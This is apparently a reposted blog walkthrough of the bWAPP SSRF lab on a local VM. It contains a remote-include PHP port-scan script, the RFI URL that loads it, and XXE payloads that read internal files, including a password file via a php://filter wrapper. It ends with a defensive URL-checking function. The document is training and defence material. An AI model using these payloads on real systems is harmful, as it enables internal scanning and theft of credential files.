OWASP bWAPP SSRF exercises
程序员文章站
2022-05-16 10:28:32
Download the OWASP virtual machine image and boot it; then access the VM's IP address from the host.
Open bWAPP.
The default username/password is bee/bug; the target address is http://192.168.111.129
http://192.168.111.129/bWAPP/ssrf.php
The SSRF page lists three tasks.
Task 1: Port scan using remote file inclusion
Clicking the first test gives
http://192.168.111.129/evil/ssrf-1.txt, which is a port-scanning script.
Its contents:
```php
<?php
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";
if(isset($_REQUEST["ip"]))
{
    // list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    $results = array();
    // the included script runs on the bWAPP server, so the TCP connection
    // attempts originate from the server itself (1 second timeout per port)
    foreach($ports as $port)
    {
        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {
            $results[$port] = true;
            fclose($pf);
        }
        else
        {
            $results[$port] = false;
        }
    }
    // report each port with its well-known service name
    foreach($results as $port=>$val)
    {
        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";
        if($val)
        {
            echo "<span style=\"color:green\">OK</span><br/>";
        }
        else
        {
            echo "<span style=\"color:red\">Inaccessible</span><br/>";
        }
    }
}
?>
```
Open the Remote & Local File Inclusion (RFI/LFI) page.
Look at the URL and modify it, putting the address of the scan script's txt file into the language parameter:
http://192.168.111.129/bWAPP/rlfi.php?language=http://192.168.111.129/evil/ssrf-1.txt&action=go
Task 2: Use XXE to read the contents of a sensitive file
Clicking the second task
gives two XXE payloads:
# Accesses a file on the internal network (1)
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
```
# Accesses a file on the internal network (2)
# Web pages return some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
```
Go to the XXE page: http://192.168.111.129/bWAPP/xxe-1.php
Intercept the POST request and modify the data shown below.
The first XXE payload retrieves robots.txt.
The second payload can be used as well, or modified to read whatever file you want.
Task 3: Use XXE to exploit a Smart TV denial-of-service vulnerability (no demo environment is available, so an SQL injection vulnerability is used instead)
Under task 2, insert the injection payload.
For background on XXE, see:
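Both tasks above work because the server fetches whatever URL it is handed: a remote include URL in task 1, and an external entity URL (including the php://filter wrapper) in task 2. The following is an added example, not code from the original post or from bWAPP, showing the outbound-URL check a defender would put in front of such a fetch: refuse non-web schemes and refuse any host that resolves to a loopback or private address. The FAKE_DNS table and the address for example.com are constructed stand-ins for a real resolver.

```python
import ipaddress
from urllib.parse import urlsplit

# Only plain web schemes may be fetched; php://, file://, gopher:// are refused.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS: hostname -> resolved addresses. A real
# deployment resolves with the system resolver and connects to the address it
# checked (not by name again), so a later answer cannot switch to an internal IP.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "example.com": ["93.184.216.34"],
    "rebind.test": ["93.184.216.34", "10.0.0.5"],   # one public, one internal
}


def is_internal(ip_text):
    """True for loopback, RFC 1918, link-local and other non-public ranges."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped            # ::ffff:127.0.0.1 -> 127.0.0.1
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_outbound_url(url, resolve=lambda host: FAKE_DNS.get(host, [])):
    """Return (allowed, reason). Every address the host resolves to must be public."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %s" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = [str(ipaddress.ip_address(host))]   # literal IP, no lookup needed
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False, "unresolvable host: %s" % host
    for ip in addrs:
        if is_internal(ip):
            return False, "internal address %s for host %s" % (ip, host)
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://192.168.111.129/evil/ssrf-1.txt",
              "http://localhost/bWAPP/robots.txt", "http://example.com/"):
        print(u, "->", check_outbound_url(u))
```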
https://www.baidu.com/link?url=zPKGRhnhZYeBDjmswYRMTgoWQZc9aAfAdXxnfI8rNeJi_NITroI5EcuzaaOVjObH&wd=&eqid=cfd29284000a5f20000000065f773d31
https://www.cnblogs.com/zhaijiahui/p/9147595.html